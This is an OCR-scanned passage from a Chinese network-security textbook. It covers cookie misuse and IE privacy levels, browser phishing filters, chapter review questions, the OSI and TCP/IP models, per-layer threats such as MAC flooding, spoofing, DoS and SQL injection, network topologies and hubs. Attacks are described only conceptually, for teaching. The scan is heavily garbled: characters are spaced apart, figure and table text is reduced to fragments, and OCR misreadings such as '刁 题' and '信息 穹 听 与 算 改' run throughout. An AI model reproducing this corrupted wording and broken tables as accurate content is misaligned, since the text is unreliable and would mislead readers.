cookie 中 存储 着 大 量 的 用 户 信息 ,十 分 的 重要 ,但 由 于 其 是 以 文本 文件 形式 存放 , 修 
改 它 轻而易举 。 若 是 黑客 修改 了 cookie 的 内 容 , 会 导致 很 多 基于 cookie 的 服务 或 应 用 失 
效 。 若 是 黑客 获取 了 受害 者 的 cookie, 对 cookie 进行 冒 用 ,尽管 其 不 知道 具体 用 户 密码 
是 什么 ,但 他 可 以 利用 这 些 已 存储 的 个 人 信息 登录 网 站 并 进行 一 些 与 用 户 行为 类 似 的 非 
法 操作 。 黑 客 也 有 可 能 使 用 cookie 欺骗 ,但 这 更 多 的 是 针对 网 站 进行 攻击 ,例如 ,有 些 网 
站 会 对 cookie 进行 判断 从 而 直接 登录 ,黑客 只 要 获取 了 该 网 站 数据 库 , 接 着 获取 管理 员 
账户 与 密码 ,只 要 修改 cookie 就 可 以 实现 以 管理 员 身 份 登录 。 

那 我 们 如 何 安全 的 使 用 cookie 呢 ? 最 常见 的 做 法 是 对 cookie 进行 删除 。 删 除 
cookie 的 操作 一 般 是 在 浏览 器 的 设置 中 .选择 删除 后 ,可 以 选择 删除 临时 文件 ,cookie、 历 
史记 录 、 下 载 历史 记录 、 表 单数 据 、 密 码 等 。IE 删除 浏览 的 历史 记录 如 图 2. 30 所 示 。 

我 们 也 可 以 设置 cookie 的 安全 级 别 。 在 IE 中 ,可 以 在 “Internet 选项 ”对 话 框 的 “ 隐 
私 ” 选 项 卡 里 设置 安全 级 别 , 如 图 2. 31 所 示 。 


删除 浏 临 的 历史 记录 [LL ZE 


i 可 以 使 您 收藏 的 网 站 能 够 保 


生 一 = 
常规 [安全 | 隐私 [内容 [连接 [程序 | 高 级 


设置 
选择 Internet 区 域 设置 。 
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| He 


有 经 您 默许 而 保存 可 用 来 联系 您 的 信息 的 第 


同 Inaternet 临时 文件 CT) 
为 快速 查看 而 保 、 图像 和 媒体 的 副本 


Cookie (0) 
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图 2.30 下 删除 浏览 的 历史 记录 图 2.31 “Internet 选项 ”对 话 框 的 “隐私 "选项 卡 


默认 的 安全 级 别 为 中 ,我 们 可 以 通过 滑 块 选择 别 的 安全 级 别 , 各 级 别 的 详细 说 明 如 
表 2.4 所 示 。 
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表 2.4 cookie 的 安全 设置 级 别 
选择 详细 说 明 
本 -阻止 来 自 所 有 网 站 的 所 有 cookie 
BE bie -该 计算 机 上 已 有 的 cookie 不 能 被 网 站 读 取 
一 -阻止 来 自 内 有 精简 隐私 策略 的 网 站 的 所 有 ookie 


-阻止 保存 可 用 来 联系 您 的 信息 而 没有 您 的 明确 同意 的 cookie 


-阻止 没有 精简 隐私 策略 的 第 三 方 cookie 
中 高 -阻止 没有 经 您 明确 同意 而 保存 可 用 来 联系 您 的 信息 的 第 三 方 cookie 
-阻止 没有 经 您 默许 而 保存 可 用 来 联系 您 的 信息 的 第 一 方 cookie 


-阻止 没有 精简 隐私 策略 的 第 三 方 cookie 
中 -阻止 没有 经 您 明确 同意 而 保存 可 用 来 联系 您 的 信息 的 第 三 方 cookie 
-限制 没有 经 您 默许 而 保存 可 用 来 联系 您 的 信息 的 第 一 方 cookie 


-阻止 没有 精简 隐私 策略 的 第 三 方 cookie 


-限制 保存 可 用 来 联系 您 的 信息 而 没有 您 的 默许 的 第 三 方 cookie 


-保存 来 自任 何 网 站 的 cookie 


护 有 所 有 oookie -该 计算 机 上 已 有 的 cookie 可 被 创建 它们 的 网 站 读 取 


2) 仿冒 网 站 筛选 

什么 是 仿冒 ? 联机 仿冒 (phishing ,发 音 为 fishing) 是 一 种 通过 电子 邮件 或 网 站 欺骗 
计算 机 用 户 泄露 个 人 或 财务 信息 的 方式 。 常 见 的 联机 仿冒 网 站 骗局 从 看 似 来 自 受 信任 
源 ( 如 银行 ,信用卡 公 司 或 可 信任 的 在 线 商 店 ) 正 式 通知 的 电子 邮件 开始 。 在 电子 邮件 
中 , 收 件 人 被 定向 到 要 求 提 供 个 人 信息 (例如 账号 或 密码 ) 的 欺骗 性 网 站 。 该 信息 通常 用 
于 身份 偷窃 。 我 们 可 以 打开 浏览 器 自 带 的 仿冒 网 站 筛选 来 防止 危害 的 发 生 。 仿 冒 网 站 
筛选 是 浏览 器 中 一 种 帮助 检测 仿冒 网 站 的 功能 。 在 您 浏览 网 页 时 ,仿冒 网 站 筛选 在 后 台 
运行 ,并 使 用 三 种 方法 来 防止 您 受到 仿冒 欺诈 。 第 一 种 方法 , 它 将 您 访问 的 网 站 地 址 与 
报告 给 合法 网 站 列表 进行 比较 。 此 列表 存储 在 您 的 计算 机 中 ;第 二 种 方法 , 它 帮 助 分 析 
您 所 访问 的 网 站 ,看 看 它们 是 否 具 有 仿冒 网 站 的 共同 特征 ;第 三 种 方法 ,经 过 用 户 的 同 
意 ,仿冒 网 站 筛选 将 一 些 网 站 地 址 发 送 给 服务 提供 商 ,以 对 照 经 常 更 新 的 已 报告 仿冒 网 
站 列表 进行 进一步 检查 。 


24 刁 题 


(1) 请 简要 说 明 (网 络 安全 法 草案 ) 的 主要 内 容 。 

(2) 网 络 信息 安全 保障 体系 包括 哪 四 个 层面 与 哪 两 个 支撑 ? 
(3) 我 国 网 络 安全 立法 体系 框架 分 为 哪 四 个 层面 ? 

(4) 我 国 网 络 安全 政策 法 规 还 存在 哪些 问题 ? 该 如 何 解决 ? 
(5) 国家 信息 安全 管理 职能 机 构 有 哪些 ? 

(6) 国家 信息 安全 基础 设施 及 机 构 有 哪些 ? 

(7) 信息 安全 产业 分 为 几 类 ? 

(8) 互联 网 安全 产业 如 何 按 产业 进行 细 分 ? 
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(9) 信息 安全 基础 设施 主要 包括 哪些 内 容 ? 

(10) 联动 作为 网 络 安全 解决 方案 的 重要 思想 ,五 大 组 成 因素 是 什么 ? 
(11) 信息 资产 如 何 进行 分 类 ? 

(12) 风险 评估 需要 考虑 的 因素 有 哪些 ? 

(13) 个 人 网 络 安全 常见 的 误区 有 哪些 ? 

(14) 网 络 安全 的 “七 种 意识 ” 指 的 是 哪 七 种 意识 ? 

(15) 请 简要 概述 密码 复杂 性 策略 。 


网 络 安全 机 切面 


31 网 络 役 备 的 工作 原理 与 安全 感 须 


311 网 络 基础 知识 


在 开始 介绍 网 络 设备 之 前 ,我 们 需要 先 了 解 一 下 计算 机 网 络 的 相关 知识 ,有 助 于 
们 更 好 地 理解 网 络 设备 的 工作 原理 与 安全 威胁 。 


1. 开放 系统 互 连 参考 模型 (OSID) 


首先 ,我 们 先 了 解 一 下 开放 系统 互 连 参考 模型 (Open System Interconnect,OSI) 。 
开放 系统 互联 参考 模型 是 国际 标准 化 组 织 (ISO) 和 国际 电报 电话 咨询 委员 会 (CCITT) 联 
合 制定 的 开放 系统 互 连 参 考 模型 ,为 开放 式 互 连 信 息 系统 提供 了 一 种 功能 结构 的 框架 。 
其 结构 从 低 到 高 分 别 是 : 物理 层 数据 链 路 层 、 网 络 层 ,传输 层 会话 层 、 表 示 层 和 应 用 层 。 
每 一 层 的 功能 是 独立 的 。 它 利用 其 下 一 层 提供 的 服务 并 为 其 上 一 层 提供 服务 ,而 与 其 他 
层 的 具体 实现 无 关 。 这 里 所 谓 的 “服务 ”就 是 下 一 层 向 上 一 层 提供 的 通信 功能 和 层 之 间 
的 会 话 规定 ,一般 用 通信 原 语 实 现 。 两 个 开放 系统 中 的 同等 层 之 间 的 通信 规则 和 约定 称 
之 为 协议 。 开 放 系 统 互 连 参 考 模型 如 图 3. 1 所 示 。 

(1) 物理 层 关注 的 是 位 流 在 信道 上 的 传输 。 这 一 层 规定 了 为 传输 数据 所 需要 的 物理 
链 路 创建 、 维 持 、 拆 除 , 而 提供 具有 机 械 的 .电子 的 、 功 能 的 和 规范 的 特性 。 其 功能 是 利用 
传输 介质 为 数据 链 路 层 提供 物理 连接 ,实现 比特 流 的 透明 传输 。 物 理 层 的 作用 是 实现 相 
邻 计算 机 节点 之 间 比 特 流 的 透明 传送 , 尽 可 能 屏蔽 掉 具 体 传输 介质 和 物理 设备 的 差异 。 
使 其 上 面 的 数据 链 路 层 不 必 考 虑 网 络 的 具体 传输 介质 是 什么 。“ 透 明 传 送 比 特 流 ”" 表 示 
经 实际 电路 传送 后 的 比特 流 没有 发 生变 化 ,对 传送 的 比特 流 来 说 ,这 个 电路 好 像 是 看 不 
见 的 。 简 单 地 说 ,物理 层 确保 原始 的 数据 可 在 各 种 物理 媒体 上 传输 。 

(2) 数据 链 路 层 在 物理 层 提供 服务 的 基础 上 向 网 络 层 提供 服务 ,通过 各 种 控制 协议 ， 
将 有 差错 的 物理 信道 变 为 无 差错 的 、 能 可 靠 传 输 数 据 帧 (frame) 的 数据 链 路 。 数 据 链 路 
层 的 具体 工作 是 接收 来 自 物理 层 的 位 流 形式 的 数据 ,并 封装 成 帧 ,传送 到 上 一 层 ; 同 样 ， 
也 将 来 自 上 层 的 数据 帧 , 拆 装 为 位 流 形 式 的 数据 转发 到 物理 层 ; 并 且 还 负责 处 理 接收 端 
发 回 的 确认 帧 的 信息 ,以 便 提供 可 靠 的 数据 传输 。 该 层 通常 又 被 分 为 介质 访问 控制 (MAC) 
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应 用 层 协议 
| 一 | ”应 用 层 
表示 层 协议 ! 
PA 一 | ”表示 层 
会 话 层 协议 | 
二 二 一 之 二 二 二 二 二 二 二 一 | ”会 话 层 
传输 层 协 议 | 
---------------------------------- 一 | ”传输 层 
网 络 层 ”一 -一 网 络 层 ”JJ---- 一 | 网 络 层 
1 
子 网 协议 | | 
效 据 链 路 层 -| 数据 链 路 层 |- -一 一 | 数据 链 路 导 
| 
物理 层 “|--- 一 | ”物理 层 |---+---- 一 | ”物理 层 


网 络 层 主机 一 一 IMP 协 议 

数据 链 路 层 主机 一 一 IMP 协 议 

物理 层 主机 一 一 IMP 协 议 

3.1 开放 系统 互 连 参考 模型 (OSI) 


和 迎 辑 链 路 控制 (LLC) 两 个 子 层 。MAC 子 层 的 主要 任务 是 解决 共享 型 网 络 中 多 用 户 对 
信道 竞争 的 问题 ,完成 网 络 介 质 的 访问 控制 ;LLC 子 层 的 主要 任务 是 建立 和 维护 网 络 连 
楼 ,执行 差错 校 验 .流量 控制 和 链 路 控制 。 

(3) 网 络 层 是 OSI 参考 模型 中 最 复杂 的 一 层 , 也 是 通信 子 网 的 最 高 一 层 。 它 的 目的 
是 实现 两 个 端 系统 之 间 的 数据 透明 传送 ,具体 功能 包括 寻 址 和 路 由 选择 .连接 的 建立 、 保 
和 寺 和 终止 等 。 它 提供 的 服务 使 传输 层 不 需要 了 解 网 络 中 的 数据 传输 和 交换 技术 。 在 数 
据 链 路 层 仅仅 是 在 相 邻 的 两 台 主 机 间 传 送 数据 ,而 网 络 层 的 两 台 主机 并 不 一 定 是 相 邻 
的 ,有 可 能 要 跨越 几 个 网 络 。 而 网 络 层 就 是 根据 传送 的 数据 包 中 携带 的 目的 主机 的 地 
址 ,为 它们 选择 合适 的 路 径 , 直 到 数据 包 到 达 主 机 。 并 且 数 据 包 在 穿越 不 同 的 网 络 时 可 
能 会 产生 兼容 性 问题 ,例如 ,地 址 格式 、 包 的 大 小 、 使 用 的 协议 等 。 这 些 都 需要 网 络 层 进 
行 解决 。 

(4) 传输 层 实现 的 是 端 到 端的 数据 传输 。 该 层 是 两 台 计算 机 经 过 网 络 进行 数据 通信 
时 ,第 一 个 端 到 端的 层次 ,具有 缓冲 作用 。 传 输 层 也 是 唯一 负责 总 体 的 数据 传输 和 数据 
控制 的 一 层 。 传 输 层 要 向 会 话 层 提供 通信 服务 的 可 靠 性 ,避免 报 文 的 出 错 、 丢 失 、 延 迟 时 
间 亲 乱 .重复 . 乱 序 等 差错 。 

(5) 会 话 层 是 建立 在 传输 层 之 上 ,利用 传输 层 提供 的 服务 ,使 应 用 建立 和 维持 会 话 ， 
并 能 使 会 话 获得 同步 。 其 功能 简单 来 说 就 是 按照 在 应 用 进程 之 间 的 约定 ,按照 正确 的 顺 
序 收 发 数据 ,进行 各 种 形式 的 对 话 。 

(6) 表示 层 向 上 对 应 用 层 服务 ,向 下 接受 来 自 会 话 层 的 服务 。 表 示 层 为 在 应 用 过 程 
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之 间 传 送 的 信息 提供 表示 方法 的 服务 , 它 只 关心 信息 发 出 的 语法 和 语义 。 例 如 ,不 同 的 
主机 可 能 对 字符 串 实行 不 同 的 编码 方式 ,为 了 不 同 编码 的 主机 间 信 息 交 流 就 需要 将 传送 
的 信息 转换 为 双方 都 能 理解 的 信息 表示 方式 。 

(7) 应 用 层 通过 使 用 下 面 各 层 所 提供 的 服务 ,直接 向 用 户 提供 服务 ,是 计算 机 网 络 与 
用 户 之 间 的 界面 或 接口 。 应 用 层 由 若干 面向 用 户 提供 服务 的 应 用 程序 和 支持 应 用 程序 
的 通信 组 件 组 成 。 

根据 上 述 内 容 ,我们 可 以 对 网 络 设备 按 OSI 模型 进行 粗略 的 归纳 。 这 些 归纳 只 是 为 
了 帮助 读者 建立 一 个 概念 ,而 现实 中 部 分 设备 一 定 对 应 哪 一 层 并 没有 那么 明确 ,例如 ， 
UTM 是 工作 于 2 一 7 层 的 设备 ;应 用 网 关 实 体 在 应 用 层 ,但 跨 多 层 工作 等 。 

物理 层 的 媒体 包括 架空 明 线 .平衡 电缆 .光纤 .无线 信道 等 。 通 信用 的 互 连 设备 指 的 
是 数据 终端 设备 和 数据 通信 设备 间 的 互 连 设备 。 数 据 终端 设备 又 称 为 物理 设备 ,如 计算 
机 终端 等 。 数 据 通信 设备 在 数据 终端 设备 和 传输 线路 之 间 提 供 信 号 变换 和 编码 功能 ， 
并 负责 建立 .保持 和 释放 链 路 的 连接 ,如 调制 解 调 器 等 。 数 据 传输 通常 是 在 数据 终端 设 
备 和 数据 通信 设备 路 径 间 来 回 。 而 互 连 设备 就 是 指 将 它们 连接 起 来 的 各 种 装置 ,如 各 种 
插头 、 插 座 、 各 种 同 轴 电 缆 、.T 型 接头 、 接 收 器 发送 器 .中 继 器 等 都 是 物理 层 的 媒体 和 连 
接 器 。 

数据 链 路 层 最 常见 的 网 络 设备 就 是 网 卡 、 网 桥 、 二 层 交 换 机 等 。 其 将 本 质 上 不 可 靠 
的 传输 媒体 变 成 可 靠 的 纯 属 通路 提供 给 网 络 层 。 

在 网 络 层 中 ,具有 开放 特性 的 网 络 中 的 数据 终端 设备 都 要 配置 网 络 层 的 功能 。 现 在 
市 面 上 常见 的 网 络 设备 主要 是 网 关 .路 由 器 .三 层 交 换 机 等 。 

由 于 OSI 是 一 个 理想 的 模型 ,因此 一 般 网 络 系统 只 涉及 其 中 的 几 层 , 很 少 有 系统 能 
够 具有 所 有 的 7 层 ,并 完全 遵循 它 的 规定 。 在 7 层 模型 中 ,每 一 层 都 提供 一 个 特殊 的 网 
络 功能 。 从 网 络 功能 的 角度 观察 : 下 面 4 层 ( 物 理 层 .数据 链 路 层 、 网 络 层 和 传输 层 ) 主要 
提供 数据 传输 和 交换 功能 , 即 以 节点 到 节点 之 间 的 通信 为 主 ;第 4 层 作为 上 下 两 部 分 的 
桥梁 ,是 整个 网 络 体系 结构 中 最 关键 的 部 分 ;而 上 3 层 ( 会 话 层 、 表 示 层 和 应 用 层 ) 则 以 提 
供用 户 与 应 用 程序 之 间 的 信息 和 数据 处 理 功 能 为 主 。 简 而 言 之 ,下 4 层 主要 完成 通信 子 
网 的 功能 ,上 3 层 主要 完成 资源 子 网 的 功能 。OSI 与 其 说 是 一 种 模型 ,不 如 说 是 一 种 分 层 
思想 ,虽然 现实 中 的 模型 不 是 OSI 模型 ,但 都 可 以 和 OSI 模型 中 的 某 几 层 相 对 应 。 例 如 ， 
Internet 上 使 用 的 是 TCP/IP 参考 模型 。 


2. TCP/IP 参考 模型 


TCP/IP( 又 称 TCP/IP 协议 族 ) 是 一 组 用 于 实现 网 络 互联 的 通信 协议 ,其 名 称 来 源 于 
该 协议 簇 中 两 个 重要 的 协议 (IP 协议 和 TCP 协议 )。 基 于 TCP/IP 的 参考 模型 将 协议 分 
成 四 个 层次 ,它们 分 别 是 链 路 层 ( 网 络 接口 层 )、 网 际 层 (IP 层 ) .传输 层 (TCP 层 ) 和 应 用 
层 。 如 图 3. 2 所 示 , 给 出 了 TCP/IP 模型 以 及 该 模型 与 OSI 模型 各 层 的 对 照 关系 和 
TCP/IP 协议 族 。 

在 TCP/IP 模型 下 ,我 们 可 以 对 各 层 的 安全 威胁 进行 归纳 。 这 些 内 容 也 基本 适用 于 
对 应 的 OSI 模型 。 


5: 网 络 安 全 模 切 面 
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OE 区区 Ss = 
文件 传输 ; 电子 邮件 , 文 。 TFTP, HTTP, SNMP, FTP, SMTP, DNS， 
应 用 层 a 
件 服务 ， 庶 拟 终端 Telnet 等 
表示 层 应 用 层 翻译 、 加 密 、 压 缩 没有 协议 
会 活 导 对 话 控制 建立 同步 点 ( 续 没有 协议 
传 ) 
传输 层 ”传输 层 。 尝 吕 3 址 、 分 失重 组 \ 流 TCp, Upp 
量 、 差 漠 控 制 


IP, ICMP, OSPF, EIGRP, IGMP,RIP, ARP, 


网 络 层 网 络 层 逻辑 寻 址 、 路 由 选择 RE 


数据 择 路 成 帧 、 物 理 寻 址 、 流 量 ， 
机 部 绩 ， 接 入 控制 SUP, CSLIP, PPP, MTU 
加 设置 网 络 拓扑 结构 、 比 特 
物理 层 a ee Wh IS02110, IEEE802, IEEE802.2 


3.2 TCP/IP 结构 对 应 OSI 和 TCP/IP 协议 族 


1) 在 数据 链 路 层 中 可 能 面临 的 威胁 

(1) 拒绝 服务 : 网 络 设备 或 者 终端 均 需 具有 相 邻 设备 的 硬件 地 址 信息 表格 。 一 个 典 
型 的 网 络 侵入 者 会 向 该 交换 机 提供 大 量 的 无 效 MAC 源 地 址 ,直到 硬件 地 址 表格 被 填 
满 。 当 这 种 情况 发 生 的 时 候 , 设 备 将 不 能 够 获得 正确 的 硬件 地 址 ,而 无 法 进行 正常 的 网 
络 通信 。 

(2) 地 址 欺骗 : 在 进行 MAC 欺骗 攻击 的 过 程 中 ,已 知 某 主机 的 MAC 地 址 会 被 用 来 
使 目标 交换 机 向 攻击 者 转发 以 该 主机 为 目的 地 址 的 数据 帧 。 通 过 发 送 带 有 该 主机 以 太 
网 源 地 址 的 单个 数据 帧 的 办 法 ,网 络 攻击 者 改写 了 目标 设备 硬件 地 址 表格 中 的 条 目 , 使 
得 交换 机 将 以 该 主机 为 目的 地 址 的 数据 包 转 发 给 该 网 络 攻 击 者 。 通 过 这 种 方式 ,黑客 们 
可 以 伪造 MAC 或 IP 地 址 ,以 便 实 施 如 下 的 两 种 攻击 , 即 服务 拒绝 和 中 间 人 攻击 。 

2) 在 网 络 层 中 可 能 面临 的 威胁 

(1) 拒绝 服务 : 网 络 层 的 拒绝 服务 攻击 以 网 络 资源 消耗 为 目的 , 它 通 过 制造 海量 网 
络 数据 报 文 或 者 利用 网 络 漏洞 使 系统 自身 循环 产生 大 量 报 文 将 用 户 网 络 带宽 完全 消耗 ， 
使 合法 用 户 得 不 到 应 有 的 资源 。 典 型 的 如 Ping flood 和 Smurf 攻击 ,一 旦 攻击 成 功 实 
施 , 网 络 出 口 带 宽 甚 至 是 整个 局 域 网 中 将 充斥 这 些 非 法 报 文 ,网 络 中 的 设备 将 无 法 进行 
正常 通信 。 

(2) 地 址 欺骗 : 同 链 路 层 的 地 址 欺骗 目的 是 一 样 的 ,IP 地 址 欺骗 同样 是 为 了 获得 目 
标 设备 的 信任 , 它 利用 伪造 的 IP 发 送 地 址 产生 虚假 的 数据 分 组 ,乔装 成 来 自 内 部 主机 ， 
使 网 络 设备 或 者 安全 设备 误 以 为 是 可 信和 报 文 而 允许 其 通过 。 

(3) 非 授权 访问 : 是 指 没 有 预先 经 过 同意 ,就 使 用 网 络 或 计算 机 资源 被 看 作 非 授权 
访问 。 对 于 一 个 脆弱 的 信息 系统 ,这 种 威胁 是 最 常见 的 。 

3) 在 传输 层 中 可 能 面临 的 威胁 

(1) 拒绝 服务 : 传输 层 的 拒绝 服务 攻击 以 服务 器 资源 耗 尽 为 目的 , 它 通过 制造 海量 
的 TCP/UDP 连接 , 耗 尽 服务 器 的 系统 连接 资源 或 者 内 存 资源 。 这 种 情况 下 ,合法 用 户 
发 出 连接 请 求 却 因 服 务 器 资源 耗 尽 而 得 不 到 应 答 。 典 型 的 如 TCP Flood 和 UDP Flood 
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攻击 ,目前 在 互联 网 上 这 类 攻击 工具 随处 可 见 , 因 其 技术 门槛 低 而 被 大 量 使 用 ,是 互联 网 
的 几 大 公害 之 一 。 某 些 情 况 下 ,攻击 者 甚至 将 攻击 提升 到 应 用 层 , 即 不 仅仅 是 发 出 连接 ， 
而 是 发 出 应 用 数据 ,这 样 的 攻击 因 不 易 与 合法 请 求 区 分 而 更 加 难以 控制 。 

(2) 端口 扫描 : 端口 扫描 攻击 是 一 种 探测 技术 ,攻击 者 可 将 它 用 于 寻找 他 们 能 够 成 
功 攻击 的 服务 。 连 接 在 网 络 中 的 所 有 计算 机 都 会 运行 许多 使 用 TCP 或 UDP 端口 的 服 
务 ,而 所 提供 的 已 定义 端口 达 6000 个 以 上 。 通 常 ,端口 扫描 不 会 造成 直接 的 损失 。 然 
而 ,端口 扫描 可 让 攻击 者 找到 可 用 于 发 动 各 种 攻击 的 端口 。 为 了 使 攻击 行为 不 被 发 现 ， 
攻击 者 通常 使 用 缓慢 扫描 跳跃 扫描 等 技术 来 躲避 检测 。 

4) 在 应 用 层 中 可 能 面临 的 威胁 

(1) 信息 穹 听 与 算 改 : 互联 网 协议 是 极其 脆弱 的 ,标准 的 IP 协议 并 未 提供 信息 隐秘 
性 保证 服务 ,因此 众多 应 用 协议 也 以 明文 进行 传输 ,如 Telnet、.FTP、HTTP 等 最 常用 的 
协议 ,甚至 连用 户口 令 都 是 明文 传输 。 这 为 攻击 者 打开 了 攻击 之 门 ,他 们 可 以 在 网 络 的 
必 有 经 之 路 搭 线 窃 听 所 关心 的 数据 , 盗 取 企 业 的 关键 业务 信息 ;严重 的 甚至 直接 对 网 络 数 
据 进行 修改 并 重 放 , 达 到 更 大 的 破坏 目的 。 

(2) 非法 信息 传播 : 由 于 无 法 阻止 非法 分 子 进 入 网 络 世界 ,互联 网 上 充斥 着 反动 . 色 
情 、 暴 力 、 封 建 迷信 等 信息 。 非 法 分 子 通 过 电子 邮件 、Web 甚至 是 IM 协议 不 断 地 发 送 各 
种 非法 信息 到 世界 各 地 的 网 络 终端 上 去 。 这 些 行为 极 大 地 破坏 了 社会 的 安定 与 和 谐 , 对 
整个 社会 来 讲 , 危 害 极 大 。 

(3) 资源 滥用 : IDC 的 统计 曾 显示 ,有 30% 一 40% 的 Internet 访问 是 与 工作 无 关 的 ， 
而 且 这 些 访问 消耗 了 相当 大 的 带宽 ,一 个 不 受 控 的 网 络 中 90% 的 带宽 被 P2P 下 载 所 占 
用 。 这 对 于 网 络 建设 者 来 讲 完全 是 灾难 , 它 意味 着 投资 利用 率 低 于 10%。 

(4) 漏洞 利用 : 网 络 协议 .操作 系统 以 及 应 用 软件 自身 存在 大 量 的 漏洞 ,通过 这 些 漏 
洞 ,黑客 能 够 获取 系统 最 高 权限 , 读 取 或 者 更 改 数据 ,典型 的 如 SQL 注入 .缓冲 区 溢出 、 
暴力 猜 解 口令 等 。 在 众多 威胁 中 ,利用 系统 漏洞 进行 攻击 所 造成 的 危害 是 最 全 面 的 ,一 
且 攻 击 行为 成 功 ,黑客 就 可 以 为 所 欲 为 。 

(5) 病毒 : 病毒 是 最 传统 的 信息 系统 破坏 者 , 随 着 互联 网 的 普及 和 广泛 应 用 ,计算 机 
病毒 的 传播 形式 有 了 根本 的 改变 ,网 络 已 经 成 为 病毒 的 主要 传播 途径 ,用 户 感染 计算 机 
病毒 的 概率 大 大 增加 。 同 时 病毒 正在 加 速 与 黑客 工具 、 木 马 软件 的 融合 ,可 以 说 病毒 的 
破坏 力 达到 了 前 所 未 有 的 程度 。 

(6) 木马 : 特洛伊 木马 是 一 种 恶意 程序 ,它们 悄悄 地 在 宿主 机 器 上 运行 ,就 在 用 户 毫 
无 察觉 的 情况 下 ,让 攻击 者 获得 了 远程 访问 和 控制 系统 的 权限 。 攻 击 者 经 常 把 特洛伊 木 
马 隐藏 在 一 些 游 戏 或 小 软件 之 中 , 诱 使 粗心 的 用 户 在 自己 的 机 器 上 运行 。 最 常见 的 情况 
是 ,上 当 的 用 户 要 么 从 不 正规 的 网 站 下 载 和 运行 了 带 恶 意 代码 的 软件 ,要 么 不 小 心 点 击 
了 带 恶 意 代码 的 邮件 附件 。 


3. 拓扑 结构 


除了 OSI 模型 与 TCP/IP 协议 ,我 们 还 需 了 解 下 计算 机 网 络 的 拓扑 结构 。 计 算 机 网 
络 的 最 主要 的 拓扑 结构 有 总 线 型 拓扑 、 环 形 拓扑 、 树 形 拓扑 、 星 形 拓扑 、 混 合 型 拓扑 以 及 
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网 状 拓扑 。 其 中 环形 拓扑 、 星 形 拓扑 、 总 线 型 拓扑 是 三 个 最 基本 的 拓扑 结构 。 在 局 域 网 
中 ,使 用 最 多 的 是 星 形 结构 。 

1) 总 线 型 拓扑 

将 所 有 的 节点 都 连接 到 一 条 电缆 上 ,把 这 条 电缆 作为 总 线 。 总 线 型 网 络 是 最 为 普及 
的 网 络 拓扑 结构 之 一 。 它 的 连接 形式 简单 .易于 安装 、 成 本 低 , 增 加 和 撤销 网 络 设备 都 比 
较 灵活 。 但 总 线 型 的 拓扑 结构 中 ,任意 的 节点 发 生 故 障 ,都 会 导致 网 络 的 阻塞 。 同时 ,这 
种 拓扑 结构 还 难以 查找 故障 。 总 线 型 拓扑 如 图 3. 3 所 示 。 总 线 型 拓扑 结构 的 优点 : 所 需 
电线 数量 较 少 ;结构 简单 ,无 源 工作 有 和 较 高 可 靠 性 ;易于 扩充 。 总 线 型 拓扑 结构 的 缺点 ;: 
总 线 传输 距离 有 限 ,通信 范围 受到 限制 ;故障 诊断 和 隔离 比较 困难 ;分 布 式 协议 不 能 保证 
信息 的 及 时 传送 ,不 具有 实时 功能 ,站 点 必须 有 介质 访问 控制 功能 ,从 而 增加 了 站 点 的 硬 


件 和 软件 开销 。 中 中 已 
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3.3 总 线 型 拓扑 


2) 环形 拓扑 
入 网 设备 通过 转发 器 接 人 网 络 ,一 个 转发 器 发 出 的 数据 只 能 被 另 一 个 转发 器 接收 并 
转发 ,所 有 的 转发 器 及 其 物理 线路 构成 的 环 状 网 络 系统 。 环 形 拓扑 如 图 3.4 所 示 。 


3.4 环形 拓扑 


112 Ms: 


3) 树 形 拓扑 
一 种 类 似 于 总 线 拓扑 的 局 域 网 拓扑 。 树 型 网 络 可 以 包含 分 支 ,每 个 分 支 又 可 包含 多 


个 结 点 ,如 图 3.5 所 示 。 


3.5 树 形 拓扑 


4) 星 形 拓扑 

在 星 形 拓扑 结构 中 ,网 络 中 的 各 节点 通过 点 到 点 的 方式 连接 到 一 个 中 央 节 点 (又 称 
中 央 转 接站 ,一般 是 集线器 或 交换 机 ) 上 ,由 该 中 央 节 点 向 目的 节点 传送 信息 。 中 央 节 点 
执行 集中 式 通 信 控 制 策 略 , 因 此 中 央 节 点 相当 复杂 ,负担 比 各 节点 重 得 多 。 在 星 形 网 中 
任何 两 个 节点 要 进行 通信 都 必须 经 过 中 央 节 点 控制 。 星 形 拓扑 如 图 3.6 所 示 。 


工作 站 
工作 站 工作 站 
HUB 
工作 站 工作 站 
图 3.6 星 形 拓扑 


5) 混合 型 拓扑 

这 种 网 络 拓扑 结构 是 由 前 面 所 讲 的 星 形 结构 和 总 线 型 结构 的 网 络 结合 在 一 起 的 网 
络 结构 ,这 样 的 拓扑 结构 更 能 满足 较 大 网 络 的 拓展 ,解决 星 形 网 络 在 传输 距离 上 的 局 限 ， 
而 同时 又 解决 了 总 线 型 网 络 在 连接 用 户 数量 的 限制 。 这 种 网 络 拓扑 结构 同时 兼顾 了 星 
形 网 与 总 线 型 网 络 的 优点 ,在 缺点 方面 得 到 了 一 定 的 弥补 。 混 合 型 拓扑 如 图 3.7 所 示 。 

6) 网 状 拓扑 

这 种 拓扑 结构 主要 指 各 节点 通过 传输 线 互 联 连接 起 来 ,并且 每 一 个 节点 至 少 与 其 他 
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图 3.7 混合 型 拓扑 


两 个 节点 相连 。 网 状 拓 扑 结构 具有 较 高 的 可 靠 性 ,但 其 结构 复杂 ,实现 起 来 费用 较 高 ,不 
易 管 理 和 维护 ,不 常用 于 局 域 网 。 网 状 拓扑 如 图 3. 8 所 示 。 
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图 3.8 网 状 拓扑 


312 常见 网 络 设备 的 工作 原理 与 安全 威胁 


1. 集线器 的 工作 原理 与 安全 威胁 


集线器 ,英文 名 称 为 Hub, 是 一 种 用 于 组 建物 理 结构 ,形状 为 星 形 的 网 络 设备 。 集 线 
器 的 主要 功能 是 对 接收 到 的 信号 进行 再 生 整 形 放大 ,以 扩大 网 络 的 传输 距离 ,因此 它 有 
延长 物理 线路 距离 的 特性 ,同时 把 所 有 节点 集中 在 以 它 为 中 心 的 节点 上 。 它 工作 于 开放 
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系统 互联 参考 模型 (OSI 第 一 层 , 即 “物理 层 ”。 集 线 器 属于 纯 硬 件 网 络 底层 设备 ,基本 上 
不 具有 类 似 于 交换 机 的 “智能 记忆 ”能 力 和 “学 习 ” 能 力 。 但 是 集线器 在 放大 正常 信号 的 
同时 也 放大 了 噪声 信号 ,噪声 信号 是 网 络 上 的 干扰 信号 , 它 将 对 正常 的 网 络 通信 造成 影 
响 。 集 线 器 的 端口 比 中 继 器 密集 ,所 以 在 某 种 情况 下 人 们 把 集线器 叫 作 “多 端口 的 中 继 
器 ”。 集 线 器 在 接 人 网 络 后 如 图 3.9 所 示 。 


计算 机 2 


计算 机 4 计算 机 5 


计算 机 6 计算 机 7 计算 机 8 
3.9 集线器 


